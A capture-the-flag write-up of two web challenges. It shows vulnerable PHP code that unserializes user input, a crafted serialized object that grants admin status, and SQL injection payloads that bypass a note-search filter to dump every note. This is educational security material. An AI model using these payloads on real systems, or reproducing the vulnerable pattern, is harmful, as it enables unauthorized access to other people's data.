ICMTC CTF 2023 (The Final) — Writeup for 2 Web Challenges
This writeup only for:
- Object Puzzle 1
- Breached
Object Puzzle 1
This challenge is for testing your “OOP” skills.
After you open the challenge, you will see “source” link… after clicking on it you will get the source code.
<?php
include 'flag.php';
session_start();
class Users
{
private $username;
private $password;
private $isAdmin = false;
private $id = '';
public function __construct($username , $password)
{
$this -> username = $username;
$this -> password = $password;
$this -> isAdmin = false;
}
public function __isAdmin(){
return $this -> isAdmin;
}
public function setUsername($username)
{
$this -> username = $username;
}
public function setPassword($password)
{
$this -> password = $password;
}
public function getUsername()
{
return $this -> username;
}
public function getPassword()
{
return $this -> password;
}
}
isset($_GET['src']) ? highlight_file(__FILE__) : '';
if(isset($_POST['data'])){
$user = unserialize($_POST['data']);
if($user -> __isAdmin())
echo $FLAG;
}
?>
<a href="?src=">source</a>
sourceThe server accepts “POST” request with parameter “data”.
you can see “unserialize” function to unserialize the “$_POST[‘data’]” value.
The server is checking if the user is admin or not… if variable “isAdmin” is true then echo the flag.
This vulnerability called “insecure deserialization” or “Object injection” where you can inject the object when it’s getting unserialized or being called.
You just need to write another class with the same name and same variables. After changing the values and serialize the object, pass the output to the server.
So i created a PHP file with a modified “Users” class:
class Users
{
public $username = 'admin';
public $password = 'admin';
public $isAdmin = true;
public $id = '';
}
echo serialize(new Users());Note that i’ve changed the variables access to “public”.
The output will be:
O:5:"Users":4:{s:8:"username";s:5:"admin";s:8:"password";s:5:"admin";s:7:"isAdmin";b:1;s:2:"id";s:0:"";}
Breached
This is a “Note Taking app” that stores your notes and let you search them. The challenge goal is to leak the admin note -AKA- The flag.
after you sign up and log in, you will see a dashboard:
You can see that users can add new notes and delete notes and search notes.
After some testing with these functions, i found “SQL” error in the search page:
Here i was struggling a bit and tried many ideas to solve this part… like selecting another note with: “x%’ or 1=1); — — ” or even dump the “information_schema” values or guess the “users” table name with:
note%' AND information_schema.table = 'users';) -- 
but as you can see, there’s a restriction for some keywords such as “SELECT”, “information_schema” and “UNION”… etc, these keywords are getting deleted.
but actually the solve of this challenge is very easy and simple. you should first try to understand the SQL error and imagine how the query is looks like, then try to go along with it… so the SQL query should be something like this:
SELECT * from notes WHERE (user_id='$userid') AND (title LIKE '%$title%' OR content LIKE '%$content%');All the above payloads is like trapped in a box… You should write your payload outside the parentheses then cut the extra query with a comment.
so, adding the payload with the right syntax to dump all the notes will be:
x%') or 1=1 -- 
and here is your flag. My lesson from this challenge is always to try inside and outside the parentheses… you should use something like this for testing:
x%' or 1=1) or 1=1 -- 
